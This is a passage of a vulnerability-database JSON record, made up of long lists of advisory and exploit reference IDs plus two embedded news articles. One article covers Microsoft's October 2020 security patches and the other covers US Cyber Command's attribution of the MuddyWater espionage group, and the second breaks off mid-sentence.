"THREATPOST:30D70449EF03FFC5099B5B141FA079E2", "THREATPOST:32F51D65448FD7613BA513B6F8239EE9", "THREATPOST:333795A46E195AC657D3C50CFAFE7B55", "THREATPOST:39625C47309704502299C3CF93814CFA", "THREATPOST:3A306ADED5369A8AA74DD95614F98FBD", "THREATPOST:3F81254E133ABD9AE724F95349C0040A", "THREATPOST:45F91A2DD716E93AA4DA0D9441E725C6", "THREATPOST:49274446DFD14E2B0DF948DA83A07ECB", "THREATPOST:49EFC5B6CFCA04F105A001AAFED52548", "THREATPOST:4A02969D23A7147DEF39EFDE11D3094E", "THREATPOST:51A2EB5F46817EF77631C9F4C6429714", "THREATPOST:51EF909F29E9FE8B04A35A1E24E52C08", "THREATPOST:5293ED4A454EC6487F8AA9DB9A0FF180", "THREATPOST:558A7B1DE564A8E368D33E86E291AB77", "THREATPOST:575F655420B93C2305DEE73F769E7E0B", "THREATPOST:58C865E4F2AA34CD62938A2E6BBFDE44", "THREATPOST:597800CEAF4F4832B357C491661792B5", "THREATPOST:5C0EFAEECFC2925A0D89538F79EE561A", "THREATPOST:5CB5F29FA05D52DEEC4D54AA46EB9235", "THREATPOST:60965118E4D29480FABA6D1722EFA4AA", "THREATPOST:639CADC540E81321048EB418C2EC7586", "THREATPOST:659B01C0432DD93535B729D005CCA9E8", "THREATPOST:6A1329627DFBA3501BA187A580E968D5", "THREATPOST:6B7259AD7487C6D17E0A301E14AEB7CB", "THREATPOST:6F4D076CD2B99D42353A5547FDBB288C", "THREATPOST:701953AF963ADACDD2280B3D18B58493", "THREATPOST:70ADDCF33645E0424EA606C8912FDDCF", "THREATPOST:718E4F36F0096BBE66CB2FAE28048810", "THREATPOST:71C45E867DCD99278A38088B59938B48", "THREATPOST:7229E2AD26BA4F6395ACBFE184C783EF", "THREATPOST:73F48A70A1B3DDD9B987BA26009E6630", "THREATPOST:7BA8370AF04822DCF1A03C685AF16604", "THREATPOST:7FC78356FBFC440CD45BB996E2A8A5C8", "THREATPOST:815A85AC4471792F2F220EAD5DD49460", "THREATPOST:85A0FA8DF1A997221A2F71AF5B8CC3E8", "THREATPOST:870C912F079364DE3A8DADFDBE4E42D1", "THREATPOST:88ED6BF6458FC657DACB44E3795710C1", "THREATPOST:891CC19008EEE7B8F1523A2BD4A37993", "THREATPOST:8A8E859062970130E3F91D160F03325C", "THREATPOST:8D6D4C10987CBF3434080EFF240D2E74", "THREATPOST:8DA5404E0E8179BD2E87B8F221395859", "THREATPOST:8E52FA6620F4FFE6ED3A412867239F2B", "THREATPOST:8F6E27B46891F0167D7799A73F1A9380", "THREATPOST:9234A5FE45618A7D601CF00D4A75748E", "THREATPOST:9530BF61FA72CF3E2B226C171BB8C5E7", "THREATPOST:9688E067E5F287042D4EBC46107C66AF", "THREATPOST:96E2DCEDA40DFA7D30B6AB9F86D38FEB", "THREATPOST:97C27999457834C42771A5FB9EEAD852", "THREATPOST:99610F4016AECF953EEE643779490F30", "THREATPOST:9AADE8E4BD604BE3415C6DD56ECA3640", "THREATPOST:A1A1E1AC8DB384C8FA2988F9A9121141", "THREATPOST:A298611BE0D737083D0CFFE084BEC006", "THREATPOST:A43BC2773FE4FB67EB7B8F584F137132", "THREATPOST:A47D83D4BBBE115E6424755328525B9D", "THREATPOST:A5D4FD6C2281AE395B821A8D0EB5736D", "THREATPOST:A5FC4C5797CA53E30A3426AF0843BFFE", "THREATPOST:A7995232CE91305C94B84BB400B1EA34", "THREATPOST:A94AAFAF28062A447CCD0F4C47FFD78C", "THREATPOST:AB0F3CD65F9FE00689C1695CB89ADC3F", "THREATPOST:AB2F6BF7F6EC16383E737E091BA9385B", "THREATPOST:ABBA6B89522F29EE1F01F3D010F46FC0", "THREATPOST:AD7CBD7ADE9D9F9DE3BBDB1AE8A6F81D", "THREATPOST:AD8A075328874910E8DCBC149A6CA284", "THREATPOST:AF18435BD7544B43152D5D3E8B97CE30", "THREATPOST:B18EFE773F83789508C61F27321B9FAA", "THREATPOST:B313D27399CB1B0B0727DC338B57B95E", "THREATPOST:B53DDA5AD9C6530F631391E064A0D4FA", "THREATPOST:B5964CC2880F7E4AFF1E9C5DEEE5B287", "THREATPOST:B664DFB1B57D66837AE025D5CD687F70", "THREATPOST:B6946D18AC7359473DB43051174C70B0", "THREATPOST:B9A8F6E46618F5253194C38A1808CF9C", "THREATPOST:B9E2C282835BF652ABC49052C859DBCC", "THREATPOST:BBAE8AE32C2E8EC0271BBA9D0498A825", "THREATPOST:BED35CFCFED307909DB60602551982A6", "THREATPOST:C22F323F8CA203A50435F11517317613", "THREATPOST:C249ACD6B53EBF0A2F149F42F6D9873D", "THREATPOST:C4650E22534F775312B3885DAA306DDA", "THREATPOST:C4D1E87CE4261EC62077E4F157643132", "THREATPOST:C51D2F2366676BB018956D93916AC33E", "THREATPOST:C7B22E2E8B3AB6D2FD4DA4F6C33951CF", "THREATPOST:C9AB0B1EBE1A344DC385414BD784DFC7", "THREATPOST:CA33E204EC4B2286ECCDD9C58B908175", "THREATPOST:CAAA6F4ECA9D8F91250F10C27A869E23", "THREATPOST:CEFF4DB144B2E463CD3FB46A8A93EEF8", "THREATPOST:CF4E8B0929D149A75E7512A74E569009", "THREATPOST:D0762E9D61E59AD261E8F24340AE261C", "THREATPOST:D2BB5A9DDB021A7E256A4E0D8A6BDA55", "THREATPOST:D3F7F2434B9347169B642A60BEC9FF02", "THREATPOST:D4F89B42660582EFECA648A891470AD4", "THREATPOST:D819574E836325FD37CCA2E8B9E979A1", "THREATPOST:DB4FE6FEC73D65579261FF6697220766", "THREATPOST:DBA639CBD82839FDE8E9F4AE1031AAF7", "THREATPOST:DF1387D21FA2EBF23BBB67081E7B75EC", "THREATPOST:DF35DF449CB3A8F93C405B227A00E117", "THREATPOST:DFC75A06F449D25EF03338C5D80C705C", "THREATPOST:E54A6B6E04C21B79F588B156DC5704F8", "THREATPOST:E95F180BE3CA693890795666169A5F04", "THREATPOST:E95FF75420C541DF65D4D795CF73B5CE", "THREATPOST:EBE40A69B865E25E52FF87060EDD790F", "THREATPOST:EE9C0062A3E6400BAF159BCA26EABB34", "THREATPOST:EFC1ED7D43C4F52F844E131EAE00990F", "THREATPOST:EFC814A6564326F98824AC875F125E0D", "THREATPOST:F1065D29808C9165285986CCB6DEBB5A", "THREATPOST:F18124E38523CE6CF73ACDCF7DBF78BC", "THREATPOST:F1B41E6C07BCAD79CFBB003B91DF332F", "THREATPOST:F2B495A97075920EEF1C7328AE80CC7B", "THREATPOST:F334DD851AFA845C7A29CB75F55E8128", "THREATPOST:F54AECDBDA250A6122DF9A079CE7AEF3", "THREATPOST:F60D403369A535076F39A474F74C925E", "THREATPOST:F9CF34A304B5CA2189D5CEDA09C8B0CB", "THREATPOST:FB79AC722601BBB92388FFC66EE0EAF4"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:8A87E8F1BA63B9BB2E84C23288C44FDC"]}, {"type": "ubuntu", "idList": ["USN-4510-1", "USN-4510-2", "USN-4559-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2020-1472"]}, {"type": "veracode", "idList": ["VERACODE:27548"]}, {"type": "zdi", "idList": ["ZDI-20-1245", "ZDI-20-1246", "ZDI-20-1249", "ZDI-20-1250", "ZDI-20-1257", "ZDI-20-1258"]}, {"type": "zdt", "idList": ["1337DAY-ID-35071", "1337DAY-ID-35274"]}]}, "score": {"value": -0.4, "vector": "NONE"}, "backreferences": {"references": [{"type": "almalinux", "idList": ["ALSA-2021:1647"]}, {"type": "amazon", "idList": ["ALAS-2021-1469", "ALAS2-2021-1585"]}, {"type": "archlinux", "idList": ["ASA-202009-17"]}, {"type": "attackerkb", "idList": ["AKB:1C1E9FA5-A4DB-4CE8-8770-2431CE166358", "AKB:7C5703D3-9E18-4F5C-A4D2-25E1F09B43CB", "AKB:9B59AD71-CB71-4C61-A639-5DC0E582DDC2", "AKB:E6BD4207-BAC0-40E1-A4C8-92B6D3D58D4B"]}, {"type": "avleonov", "idList": ["AVLEONOV:28E47C69DA4A069031694EB4C2C931BA", "AVLEONOV:93A5CCFA19B815AE15942F533FFD65C4", "AVLEONOV:F17F36C3CC642EBDC27E43900FE3905E"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:19B4E04F8F1723A4F28FA7A8354698AF", "CARBONBLACK:91F55D2B8B2999589579EACB1542A3E9", "CARBONBLACK:A526657711947788A54505B0330C16A0"]}, {"type": "centos", "idList": ["CESA-2020:5439"]}, {"type": "cert", "idList": ["VU:490028"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2020-0872", "CPAI-2020-0901", "CPAI-2020-1004", "CPAI-2020-1043", "CPAI-2020-1095", "CPAI-2020-1367"]}, {"type": "cisa", "idList": ["CISA:2B970469D89016F563E142BE209443D8", "CISA:348CDAC76EADE8EE621368419146CDE1", "CISA:433F588AAEF2DF2A0B46FE60687F19E0", "CISA:48962A3B37B032DCF622B3E3135B8A1A", "CISA:61F2653EF56231DB3AEC3A9E938133FE", "CISA:7E93687DEED7F2EA7EFAEBA997B30A5D", "CISA:7FB0A467C0EB89B6198A58418B43D50C", "CISA:990FCFCEB1D9B60F5FAA47A1F537A3CB"]}, {"type": "cve", "idList": ["CVE-2020-1472", "CVE-2020-16891", "CVE-2020-16898", "CVE-2020-16909", "CVE-2020-16911", "CVE-2020-16915", "CVE-2020-16923", "CVE-2020-16938", "CVE-2020-16947", "CVE-2020-16951", "CVE-2020-16952", "CVE-2020-16967", "CVE-2020-16968", "CVE-2020-17003", "CVE-2020-5135"]}, {"type": "debian", "idList": ["DEBIAN:DLA-2463-1:1381E"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2020-1472"]}, {"type": "exploitdb", "idList": ["EDB-ID:49071"]}, {"type": "f5", "idList": ["F5:K93951507"]}, {"type": "fedora", "idList": ["FEDORA:38D8230C58CD", "FEDORA:4A64830CFCDC", "FEDORA:D8A0E3053060"]}, {"type": "fireeye", "idList": ["FIREEYE:D64714BFF80E34308579150D4C839557"]}, {"type": "freebsd", "idList": ["24ACE516-FAD7-11EA-8D8C-005056A311D1"]}, {"type": "gentoo", "idList": ["GLSA-202012-24"]}, {"type": "githubexploit", "idList": ["02065E08-7493-5F8F-BA4C-860931D3D2D3", "042AB58A-C86A-5A8B-AED3-2FF3624E97E3", "04BCA9BC-E3AD-5234-A5F0-7A1ED826F600", "06BAC40D-74DF-5994-909F-3A87FC3B76C8", "07DF268C-467E-54A3-B713-057BA19C72F7", "07E56BF6-A72B-5ACD-A2FF-818C48E4E132", "08C67247-7D33-5943-A7AF-2E9C8989658E", "0CFAB531-412C-57A0-BD9E-EF072620C078", "12E44744-1AF0-523A-ACA2-593B4D33E014", "14BD2DBD-3A91-55FC-9836-14EF9ABF56CF", "20466D13-6C5B-5326-9C8B-160E9BE37195", "2255B39F-1B91-56F4-A323-8704808620D3", "28D42B84-AB24-5FC6-ADE1-610374D67F21", "2D16FB2A-7A61-5E45-AAF8-1E090E0ADCC0", "2E71FF50-1B48-5A8E-9212-C4CF9399715C", "3F400483-1F7E-5BE5-8612-4D55D450D553", "49EC151F-12F0-59CF-960C-25BD54F46680", "4CB63A18-5D6F-57E3-8CD8-9110CF63E120", "50FA6373-CBCD-5EF5-B37D-0ECD621C6134", "59F9AB6D-E4E2-5EEF-9F2E-2337B7C8D4B9", "5B025A0D-055E-552C-B1FB-287C6F191F8E", "5E80DB20-575C-537A-9B83-CCFCCB55E448", "60DC34D5-16D7-5E65-8C51-B36123C2EF39", "63C36F7A-5F99-5A79-B99F-260360AC237F", "699EB52B-3630-500F-BA12-8F3B95E22A12", "6FB0B63E-DE9A-5065-B577-ECA3ED5E9F4B", "7078ED42-959E-5242-BE9D-17F2F99C76A8", "803A4C79-0547-5178-A113-233AC5D2498C", "879CF3A7-ECBC-552A-A044-5E2724F63279", "87B06BBD-7ED2-5BD2-95E1-21EE66501505", "8B5E018D-C89A-519A-8923-D1E3290A79C8", "92ED250D-4B79-5B70-A5ED-2A55493C90CA", "939F3BE7-AF69-5351-BD56-12412FA184C5", "9C9BD402-511C-597D-9864-647131FE6647", "A24AC1AC-55EF-51D8-B696-32F369DCAB96", "AB5BA257-13FA-5667-BDBE-A3E1C4658F49", "AEF449B8-DC3E-544A-A748-5A1C6F7EBA59", "B5E5F84A-7647-5D17-9E1D-643518A6A3A9", "B7C1C535-3653-5D12-8922-4C6A5CCBD5F3", "BA280EB1-2FF9-52DA-8BA4-A276A1158DD8", "BBE1926E-1EC7-5657-8766-3CA8418F815C", "C5B49BD0-D347-5AEB-A774-EE7BB35688E9", "C7CE5D12-A4E5-5FF2-9F07-CD5E84B4C02F", "C7F6FB3B-581D-53E1-A2BF-C935FE7B03C8", "C96C8DD1-344C-5476-85AC-6D2865A5C00F", "CD749811-2E16-5303-AD4B-1A0DDBCD78A4", "CF07CF32-0B8E-58E5-A410-8FA68D411ED0", "D178DAA4-01D0-50D0-A741-1C3C76A7D023", "D3C401E0-D013-59E2-8FFB-6BEF41DA3D1B", "D7EB3EE2-A5C4-5CC7-B84F-D32CEB99D65A", "DEC5B8BB-1933-54FF-890E-9C2720E9966E", "E9F25671-2BEF-5E8B-A60A-55C6DD9DE820", "F085F702-F1C3-5ACB-99BE-086DA182D98B", "F9B55BEE-32D1-5654-A978-E27E752E7163", "FC661572-B96B-5B2C-B12F-E8D279E189BF"]}, {"type": "hivepro", "idList": ["HIVEPRO:8DA601C83DB9C139357327C06B06CB36"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20201105-01-NETLOGON"]}, {"type": "ibm", "idList": ["8190BE7075BCD3ECD99D09840619467A00B84599B985C4B2AB342389339984B1"]}, {"type": "kaspersky", "idList": ["KLA11929", "KLA11931"]}, {"type": "krebs", "idList": ["KREBS:7252221B56E65C46DEF83A6DDC0B70FB", "KREBS:A8F0DD3F6E965A3A66B2CCBB003ACF62"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:78E91E28F51B0A15B6CA53FF8A9B480B"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2020-16923/", "MSF:ILITIES/MSFT-CVE-2020-16951/"]}, {"type": "mmpc", "idList": ["MMPC:D6D537E875C3CBD84822A868D24B31BA"]}, {"type": "mscve", "idList": ["MS:CVE-2020-1472", "MS:CVE-2020-16891", "MS:CVE-2020-16898", "MS:CVE-2020-16909", "MS:CVE-2020-16911", "MS:CVE-2020-16915", "MS:CVE-2020-16923", "MS:CVE-2020-16938", "MS:CVE-2020-16947", "MS:CVE-2020-16951", "MS:CVE-2020-16952", "MS:CVE-2020-16967", "MS:CVE-2020-16968", "MS:CVE-2020-17003"]}, {"type": "mskb", "idList": ["KB4601347"]}, {"type": "msrc", "idList": ["MSRC:5B84BD451283462DC81D4090EFE66280", "MSRC:96F2FB0D77EED0ABDED8EBD64AEBEA09"]}, {"type": "mssecure", "idList": ["MSSECURE:D6D537E875C3CBD84822A868D24B31BA"]}, {"type": "nessus", "idList": ["AL2_ALAS-2021-1585.NASL", "ALA_ALAS-2021-1469.NASL", "CENTOS8_RHSA-2021-1647.NASL", "CENTOS_RHSA-2020-5439.NASL", "DEBIAN_DLA-2463.NASL", "EULEROS_SA-2021-1050.NASL", "EULEROS_SA-2021-1118.NASL", "FREEBSD_PKG_24ACE516FAD711EA8D8C005056A311D1.NASL", "GENTOO_GLSA-202012-24.NASL", "OPENSUSE-2020-1526.NASL", "ORACLELINUX_ELSA-2020-5439.NASL", "ORACLELINUX_ELSA-2021-1647.NASL", "REDHAT-RHSA-2020-5439.NASL", "REDHAT-RHSA-2021-1647.NASL", "SL_20201215_SAMBA_ON_SL7_X.NASL", "SMB_NT_MS20_AUG_4565349.NASL", "SMB_NT_MS20_AUG_4571694.NASL", "SMB_NT_MS20_AUG_4571703.NASL", "SMB_NT_MS20_AUG_4571729.NASL", "SMB_NT_MS20_AUG_4571736.NASL", "SMB_NT_MS20_OCT_3D_VIEWER.NASL", "SMB_NT_MS20_OCT_4580327.NASL", "SMB_NT_MS20_OCT_4580346.NASL", "SMB_NT_MS20_OCT_4580347.NASL", "SMB_NT_MS20_OCT_4580378.NASL", "SMB_NT_MS20_OCT_4580382.NASL", "SMB_NT_MS20_OCT_OFFICE_SHAREPOINT_2013.NASL", "SMB_NT_MS20_OCT_OFFICE_SHAREPOINT_2016.NASL", "SMB_NT_MS20_OCT_OFFICE_SHAREPOINT_2019.NASL", "SMB_NT_MS20_OCT_OUTLOOK.NASL", "SONICWALL_SNWLID-2020-0010.NASL", "SUSE_SU-2020-2719-1.NASL", "SUSE_SU-2020-2720-1.NASL", "SUSE_SU-2020-2721-1.NASL", "SUSE_SU-2020-2722-1.NASL", "SUSE_SU-2020-2724-1.NASL", "SUSE_SU-2020-2730-1.NASL", "UBUNTU_USN-4510-1.NASL"]}, {"type": "oraclelinux", "idList": ["ELSA-2020-5439", "ELSA-2021-1647"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:159612", "PACKETSTORM:160127"]}, {"type": "pentestpartners", "idList": ["PENTESTPARTNERS:8FD1C9A0D76A3084445136A0275847C0"]}, {"type": "ptsecurity", "idList": ["PT-2020-29"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:192411B44569225E2F2632594DC4308C", "QUALYSBLOG:7799BDEDC6C56E9CAE494D08410C252D", "QUALYSBLOG:9E7466695714D29E4314F63F45A74EB3"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:0E497787F9B42FC1D11439220E6A9D3F", "RAPID7BLOG:486F801929E1F794197FC08AE13E4CB5", "RAPID7BLOG:49C18614AD01B6865616A65F734B9F71", "RAPID7BLOG:5586742AC0F1C66F56B3583482B0960A", "RAPID7BLOG:801DC63ED24DFFC38FE4775AAD07ADDB", "RAPID7BLOG:C628D3D68DF3AE5A40A1F0C9DFA38860", "RAPID7BLOG:E36C557104ECB6E144C21C3C499B0492"]}, {"type": "redhat", "idList": ["RHSA-2021:3723"]}, {"type": "redhatcve", "idList": ["RH:CVE-2020-1472"]}, {"type": "samba", "idList": ["SAMBA:CVE-2020-1472"]}, {"type": "securelist", "idList": ["SECURELIST:100DB957ACFED2B9DC6D860183E5B88F", "SECURELIST:73735B62C781261398E44FFF82262BCD", "SECURELIST:847981DCB9E90C51F963EE1727E40915"]}, {"type": "srcincite", "idList": ["SRC-2020-0022", "SRC-2020-0024"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2020:1513-1"]}, {"type": "talosblog", "idList": ["TALOSBLOG:A654303FB4331FDBB91B999EC882BE7A"]}, {"type": "thn", "idList": ["THN:0A61A90DD0F88453854B73FE249BC379", "THN:C3154ED3ABE28924B7CC42873DED19BB", "THN:E9454DED855ABE5718E4612A2A750A98", "THN:F4928090525451C50A1B016ED3B0650F", "THN:F53D18B9EB0F8CD70C9289288AC9E2E1"]}, {"type": "threatpost", "idList": ["THREATPOST:033645C929899D29D91092278D188D8E", "THREATPOST:050A36E6453D4472A2734DA342E95366", "THREATPOST:0A238D67F7286BA41103801846210F7A", "THREATPOST:0DD2AEA1738F9B6612B1C845F3BC949F", "THREATPOST:0ED2C20BB1821A77810AB2D29BB6A6A5", "THREATPOST:23D55C85EA8B442C858FF058C5E25DBC", "THREATPOST:27150C099FB4771B9DED4F6372D27EB7", "THREATPOST:30D70449EF03FFC5099B5B141FA079E2", "THREATPOST:45F91A2DD716E93AA4DA0D9441E725C6", "THREATPOST:49274446DFD14E2B0DF948DA83A07ECB", "THREATPOST:558A7B1DE564A8E368D33E86E291AB77", "THREATPOST:5C0EFAEECFC2925A0D89538F79EE561A", "THREATPOST:639CADC540E81321048EB418C2EC7586", "THREATPOST:701953AF963ADACDD2280B3D18B58493", "THREATPOST:71C45E867DCD99278A38088B59938B48", "THREATPOST:7229E2AD26BA4F6395ACBFE184C783EF", "THREATPOST:85A0FA8DF1A997221A2F71AF5B8CC3E8", "THREATPOST:870C912F079364DE3A8DADFDBE4E42D1", "THREATPOST:8A8E859062970130E3F91D160F03325C", "THREATPOST:A1A1E1AC8DB384C8FA2988F9A9121141", "THREATPOST:A43BC2773FE4FB67EB7B8F584F137132", "THREATPOST:A47D83D4BBBE115E6424755328525B9D", "THREATPOST:A5D4FD6C2281AE395B821A8D0EB5736D", "THREATPOST:A5FC4C5797CA53E30A3426AF0843BFFE", "THREATPOST:AF18435BD7544B43152D5D3E8B97CE30", "THREATPOST:BBAE8AE32C2E8EC0271BBA9D0498A825", "THREATPOST:CF4E8B0929D149A75E7512A74E569009", "THREATPOST:DFC75A06F449D25EF03338C5D80C705C", "THREATPOST:EE9C0062A3E6400BAF159BCA26EABB34", "THREATPOST:F60D403369A535076F39A474F74C925E", "THREATPOST:F9CF34A304B5CA2189D5CEDA09C8B0CB"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:8A87E8F1BA63B9BB2E84C23288C44FDC"]}, {"type": "ubuntu", "idList": ["USN-4510-1", "USN-4510-2", "USN-4559-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2020-1472"]}, {"type": "zdi", "idList": ["ZDI-20-1245", "ZDI-20-1246", "ZDI-20-1249", "ZDI-20-1250", "ZDI-20-1257", "ZDI-20-1258"]}, {"type": "zdt", "idList": ["1337DAY-ID-35071"]}]}, "exploitation": null, "vulnersScore": -0.4}, "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1660004461, "score": 1659899336}, "_internal": {"score_hash": "c8edffc94be13be3d45c168b21c791e9"}}

{"thn": [{"lastseen": "2022-05-09T12:38:49", "description": "[](<https://thehackernews.com/images/-P25Aj2pIdU8/X4bOLR8F4AI/AAAAAAAAA4I/ssjGOq33ezggOeKe6QlubDqh6ObkWDpvgCLcBGAsYHQ/s0/windows-update-download.jpg>)\n\nMicrosoft on Tuesday issued fixes for 87 newly discovered security vulnerabilities as part of its [October 2020 Patch Tuesday](<https://portal.msrc.microsoft.com/en-us/security-guidance/releasenotedetail/2020-Oct>), including two critical remote code execution (RCE) flaws in Windows TCP/IP stack and Microsoft Outlook.\n\nThe flaws, 11 of which are categorized as Critical, 75 are ranked Important, and one is classified Moderate in severity, affect Windows, Office and Office Services and Web Apps, Visual Studio, Azure Functions, .NET Framework, Microsoft Dynamics, Open Source Software, Exchange Server, and the Windows Codecs Library.\n\nAlthough none of these flaws are listed as being under active attack, six vulnerabilities are listed as publicly known at the time of release.\n\nChief among the most critical bugs patched this month include [CVE-2020-16898](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16898>) (CVSS score 9.8). According to Microsoft, an attacker would have to send specially crafted ICMPv6 Router Advertisement packets to a remote Windows computer to exploit the RCE flaw in the TCP/IP stack to execute arbitrary code on the target client or server.\n\nAccording to [McAfee](<https://www.mcafee.com/blogs/other-blogs/mcafee-labs/cve-2020-16898-bad-neighbor/>) security experts, 'this type of bug could be made wormable,' allowing hackers to launch an attack that can spread from one vulnerable computer to another without any human interaction.\n\nA second vulnerability to keep track of is [CVE-2020-16947](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16947>), which concerns an RCE flaw on affected versions of Outlook that could allow code execution just by viewing a specially crafted email.\n\n\"If the current user is logged on with administrative user rights, an attacker could take control of the affected system,\" Microsoft noted in its advisory. \"An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\"\n\nAnother critical RCE vulnerability in Windows Hyper-V ([CVE-2020-16891](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16891>), CVSS score 8.8) exists due to improper validation of input from an authenticated user on a guest operating system.\n\nAs a result, an adversary could exploit this flaw to run a specially crafted program on a guest operating system that could cause the Hyper-V host operating system to execute arbitrary code.\n\nTwo other critical RCE flaws ([CVE-2020-16967](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16967>) and [CVE-2020-16968](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16968>)) affect Windows Camera Codec Pack, permitting an attacker to send a malicious file that, when opened, exploits the flaw to run arbitrary code in the context of the current user.\n\nFinally, the patch also addresses a privilege escalation flaw ([CVE-2020-16909](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16909>)) associated with Windows Error Reporting (WER) component that could allow an authenticated attacker to execute malicious applications with escalated privileges and gain access to sensitive information.\n\nOther critical flaws fixed by Microsoft this month include RCE flaws in SharePoint, Media Foundation Library, Base3D rendering engine, Graphics Components, and the Windows Graphics Device Interface (GDI).\n\nIt's highly recommended that Windows users and system administrators apply the latest security patches to mitigate the threats associated with these issues. \n\nFor installing the latest [security updates](<https://support.microsoft.com/en-in/help/4027667/windows-10-update>), Windows users can head to Start &gt; Settings &gt; Update &amp; Security &gt; Windows Update, or by selecting Check for Windows updates.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-10-14T10:10:00", "type": "thn", "title": "Microsoft Releases Patches For Critical Windows TCP/IP and Other Bugs", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16891", "CVE-2020-16898", "CVE-2020-16909", "CVE-2020-16947", "CVE-2020-16967", "CVE-2020-16968"], "modified": "2020-10-16T06:20:48", "id": "THN:C3154ED3ABE28924B7CC42873DED19BB", "href": "https://thehackernews.com/2020/10/windows-tcp-ip-patch-tuesday.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:37:43", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEiVFy-c1DNicC29AR3JBTrZ5vLEcY8DjJCDttbLNNeDlQZYaSjqUwPLUJ-s1PB7sY5MtBXBQIE3kr_q_JtCC1MWrPLvh1bj_s3_LKlvzXxATEAyDwPx4nE9sOS_sXNUdyfPzB4JC4ChR3tNCPMdi7u2Kzs4yfrnB7Uh3cBZP29GPNeHzdCf28ylkvRK>)\n\nThe U.S. Cyber Command (USCYBERCOM) on Wednesday officially confirmed MuddyWater's ties to the Iranian intelligence apparatus, while simultaneously detailing the various tools and tactics adopted by the espionage actor to burrow into victim networks.\n\n\"MuddyWater has been seen using a variety of techniques to maintain access to victim networks,\" USCYBERCOM's Cyber National Mission Force (CNMF) [said](<https://www.cisa.gov/uscert/ncas/current-activity/2022/01/12/cnmf-identifies-and-discloses-malware-used-iranian-apt-muddywater>) in a statement. \"These include side-loading [DLLs](<https://en.wikipedia.org/wiki/Dynamic-link_library>) in order to trick legitimate programs into running malware and obfuscating PowerShell scripts to hide command and control functions.\"\n\nThe agency characterized the hacking efforts as a subordinate element within the Iranian Ministry of Intelligence and Security (MOIS), corroborating earlier reports about the nation-state actor's provenance.\n\nAlso tracked under the monikers Static Kitten, Seedworm, Mercury and TEMP.Zagros, [MuddyWater](<https://malpedia.caad.fkie.fraunhofer.de/actor/muddywater>) is known for its [attacks](<https://www.clearskysec.com/muddywater-targets-kurdish-groups-turkish-orgs/>) primarily directed against a wide gamut of entities in governments, academia, cryptocurrency, telecommunications, and oil sectors in the Middle East. The group is believed to have been [active](<https://unit42.paloaltonetworks.com/unit42-muddying-the-water-targeted-attacks-in-the-middle-east/>) at least [since 2017](<https://blog.malwarebytes.com/threat-analysis/2017/09/elaborate-scripting-fu-used-in-espionage-attack-against-saudi-arabia-government_entity/>).\n\nRecent intrusions mounted by the adversary have involved exploiting the ZeroLogon (CVE-2020-1472) vulnerability as well as leveraging remote desktop management tools such as [ScreenConnect](<https://thehackernews.com/2021/02/iranian-hackers-utilize-screenconnect.html>) and [Remote Utilities](<https://thehackernews.com/2021/03/iranian-hackers-using-remote-utilities.html>) to deploy custom backdoors that could enable the attackers to gain unauthorized access to sensitive data.\n\nLast month, Symantec's Threat Hunter Team [publicized findings](<https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-campaign-telecoms-asia-middle-east>) about a new wave of hacking activities unleashed by the Muddywater group against a string of telecom operators and IT companies throughout the Middle East and Asia during the previous six months using a blend of legitimate tools, publicly available malware, and living-off-the-land ([LotL](<https://encyclopedia.kaspersky.com/glossary/lotl-living-off-the-land/>)) methods.\n\nAlso incorporated into its toolset is a backdoor named Mori and a piece of malware called PowGoop, a DLL loader designed to decrypt and run a PowerShell-based script that establishes network communications with a remote server.\n\nMalware samples attributed to the advanced persistent threat (APT) have been made available on the VirusTotal malware aggregation repository, which can be accessed [here](<https://www.virustotal.com/gui/user/CYBERCOM_Malware_Alert>).\n\n\"Analysis of MuddyWater activity suggests the group continues to evolve and adapt their techniques,\" SentinelOne researcher Amitai Ben Shushan Ehrlich 